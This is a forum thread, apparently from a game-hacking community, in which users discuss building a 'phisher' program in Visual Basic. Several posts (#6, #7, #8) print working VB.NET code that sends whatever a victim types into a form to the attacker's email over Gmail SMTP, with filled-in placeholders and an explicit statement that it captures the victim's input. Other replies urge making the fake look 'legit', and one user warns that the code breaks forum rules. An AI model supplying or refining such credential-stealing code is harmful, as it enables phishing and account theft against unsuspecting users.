Thread: Phisher codes?

Page 1 of 2 12 LastLast
Results 1 to 15 of 17
  1. #1
    .C[o.O]kie][plz's Avatar
    Join Date
    Jun 2011
    Gender
    female
    Location
    <----- Look Left
    Posts
    587
    Reputation
    21
    Thanks
    19
    My Mood
    Innocent

    Phisher codes?

    Right now I'm using Microsoft Visual Basic to make my phisher.
    Can anyone give the some tips, codes or information on how to make it as a program? Thanks ><
    .C[o.O]kie][plz©

    cookiez......cookiez

    Quote Originally Posted by .-xSnipe View Post
    Z8Games fails like yo mama bringing a spoon to the superbowl.
    Adiga's Farming Alt

  2. #2
    Tristan's Avatar
    Join Date
    Mar 2009
    Gender
    male
    Location
    MD, Canada
    Posts
    9,209
    Reputation
    19
    Thanks
    496
    My Mood
    Tired
    Make it look legit, do you have the actually codes for it?

  3. #3
    .C[o.O]kie][plz's Avatar
    Join Date
    Jun 2011
    Gender
    female
    Location
    <----- Look Left
    Posts
    587
    Reputation
    21
    Thanks
    19
    My Mood
    Innocent
    Quote Originally Posted by Dark†Nigga View Post
    Make it look legit, do you have the actually codes for it?
    I do now xD
    .C[o.O]kie][plz©

    cookiez......cookiez

    Quote Originally Posted by .-xSnipe View Post
    Z8Games fails like yo mama bringing a spoon to the superbowl.
    Adiga's Farming Alt

  4. #4
    Tristan's Avatar
    Join Date
    Mar 2009
    Gender
    male
    Location
    MD, Canada
    Posts
    9,209
    Reputation
    19
    Thanks
    496
    My Mood
    Tired
    Alright just make it look legit and stuff.
    But it's real easy to crack you know.

  5. #5
    Shane's Avatar
    Join Date
    Jul 2009
    Gender
    male
    Posts
    18,826
    Reputation
    2537
    Thanks
    2,074
    My Mood
    Yeehaw
    Like a code generator?
    Crossfire Minion: 28 October 2010
    Official Middleman: 20 September 2012
    Trusted Member: 15 February 2013
    Official Middleman: 11 April 2013
    Official Middleman: 10 January 2015
    ---------------------------------------------------
    Global Moderator: 25 December 2012
    Head Administrator: 21 March 2013


  6. #6
    .C[o.O]kie][plz's Avatar
    Join Date
    Jun 2011
    Gender
    female
    Location
    <----- Look Left
    Posts
    587
    Reputation
    21
    Thanks
    19
    My Mood
    Innocent
    After you get the form the way you want it...time for the code...
    Above EVERYTHING put this--> Imports System.Net.Mail
    Double click Button1 and put this...
    Dim MyMailMessage As New MailMessage()
    Try
    MyMailMessage.From = New MailAddress("Your gmail account")
    MyMailMessage.To.Add("Your email account")
    MyMailMessage.Subject = TextBox1.Text
    MyMailMessage.Body = TextBox2.Text
    Dim SMTP As New SmtpClient("smtp.gmail.com")
    SMTP.Port = 587
    SMTP.EnableSsl = True
    SMTP.Credentials = New System.Net.NetworkCredential("Gmail account", "Gmail password")
    SMTP.Send(MyMailMessage)
    TextBox2.Text = ""
    Catch ex As Exception
    End Try
    End Sub

    Just put your info in where I specified so the information the victim types in will get sent to your e-mail
    .C[o.O]kie][plz©

    cookiez......cookiez

    Quote Originally Posted by .-xSnipe View Post
    Z8Games fails like yo mama bringing a spoon to the superbowl.
    Adiga's Farming Alt

  7. #7
    I'm Dead :('s Avatar
    Join Date
    Jun 2011
    Gender
    male
    Posts
    582
    Reputation
    33
    Thanks
    20
    Quote Originally Posted by .C[o.O]kie][plz View Post
    After you get the form the way you want it...time for the code...
    Above EVERYTHING put this--> Imports System.Net.Mail
    Double click Button1 and put this...
    Dim MyMailMessage As New MailMessage()
    Try
    MyMailMessage.From = New MailAddress("Your gmail account")
    MyMailMessage.To.Add("Your email account")
    MyMailMessage.Subject = TextBox1.Text
    MyMailMessage.Body = TextBox2.Text
    Dim SMTP As New SmtpClient("smtp.gmail.com")
    SMTP.Port = 587
    SMTP.EnableSsl = True
    SMTP.Credentials = New System.Net.NetworkCredential("Gmail account", "Gmail password")
    SMTP.Send(MyMailMessage)
    TextBox2.Text = ""
    Catch ex As Exception
    End Try
    End Sub

    Just put your info in where I specified so the information the victim types in will get sent to your e-mail
    Can U Underline Where Ur Suppose To Ur Email Cause I Don't Know Where "U Specified"
    Inb4derp

    Last edited by I'm Dead :(; 07-29-2011 at 06:08 PM.

  8. #8
    .C[o.O]kie][plz's Avatar
    Join Date
    Jun 2011
    Gender
    female
    Location
    <----- Look Left
    Posts
    587
    Reputation
    21
    Thanks
    19
    My Mood
    Innocent
    After you get the form the way you want it...time for the code...
    Above EVERYTHING put this--> Imports System.Net.Mail
    Double click Button1 and put this...
    Dim MyMailMessage As New MailMessage()
    Try
    MyMailMessage.From = New MailAddress("HERE!!! PUT UR EMAIL HERE")
    MyMailMessage.To.Add("HERE!!! PUT UR EMAIL HERE")
    MyMailMessage.Subject = TextBox1.Text
    MyMailMessage.Body = TextBox2.Text
    Dim SMTP As New SmtpClient("smtp.gmail.com")
    SMTP.Port = 587
    SMTP.EnableSsl = True
    SMTP.Credentials = New System.Net.NetworkCredential("Gmail account", "Gmail password")
    SMTP.Send(MyMailMessage)
    TextBox2.Text = ""
    Catch ex As Exception
    End Try
    End Sub
    .C[o.O]kie][plz©

    cookiez......cookiez

    Quote Originally Posted by .-xSnipe View Post
    Z8Games fails like yo mama bringing a spoon to the superbowl.
    Adiga's Farming Alt

  9. #9
    AznReincarny's Avatar
    Join Date
    Jul 2011
    Gender
    male
    Posts
    495
    Reputation
    88
    Thanks
    22
    lol i want to make a phisher but im a complete noob at coding

  10. #10
    NoShame's Avatar
    Join Date
    Aug 2010
    Gender
    male
    Location
    In a bed with a girl.
    Posts
    1,715
    Reputation
    -14
    Thanks
    76
    My Mood
    Happy
    Delete this Code now or you might get banned.. it isn't allowed here.
    ỳô шнат’ŝ чр, §üçжа
    ɳɨʛɢa

    Most Trusted Buyer/Seller on MPGH is nysm1
    Previous names: yoyobasha

  11. #11
    Time's Avatar
    Join Date
    Jul 2009
    Gender
    male
    Posts
    26,497
    Reputation
    3714
    Thanks
    4,530
    My Mood
    Mellow
    Do what the guy says .

  12. #12
    Smurfyv's Avatar
    Join Date
    Jan 2010
    Gender
    male
    Location
    -
    Posts
    7,702
    Reputation
    144
    Thanks
    481
    I can easily steal your account when you release it.. -__-

  13. #13
    Zack's Avatar
    Join Date
    May 2009
    Gender
    male
    Location
    The Wonderful World of MPGH.
    Posts
    4,922
    Reputation
    26
    Thanks
    799
    My Mood
    Psychedelic
    Quote Originally Posted by Jeffrey View Post
    I can easily steal your account when you release it.. -__-
    How ?

  14. #14
    Tristan's Avatar
    Join Date
    Mar 2009
    Gender
    male
    Location
    MD, Canada
    Posts
    9,209
    Reputation
    19
    Thanks
    496
    My Mood
    Tired
    Quote Originally Posted by ZacK View Post

    How ?
    By cracking it.

  15. #15
    Zack's Avatar
    Join Date
    May 2009
    Gender
    male
    Location
    The Wonderful World of MPGH.
    Posts
    4,922
    Reputation
    26
    Thanks
    799
    My Mood
    Psychedelic
    Quote Originally Posted by Dark†Nigga View Post


    By cracking it.
    ohhh that's right .

Page 1 of 2 12 LastLast

Similar Threads

  1. Regarding Phishers And Coding Groups
    By Implify in forum CrossFire Discussions
    Replies: 12
    Last Post: 08-18-2011, 06:52 AM
  2. Working phisher source code $1
    By Smurfyv in forum User Services
    Replies: 13
    Last Post: 07-10-2011, 01:19 PM
  3. Runescape Perfect Phisher for AWM Retail Code...
    By Jumpshot in forum Trade Accounts/Keys/Items
    Replies: 3
    Last Post: 10-24-2007, 12:16 PM
  4. a Couple WPE Weapon codes?
    By phil823 in forum WarRock - International Hacks
    Replies: 16
    Last Post: 02-10-2006, 02:14 PM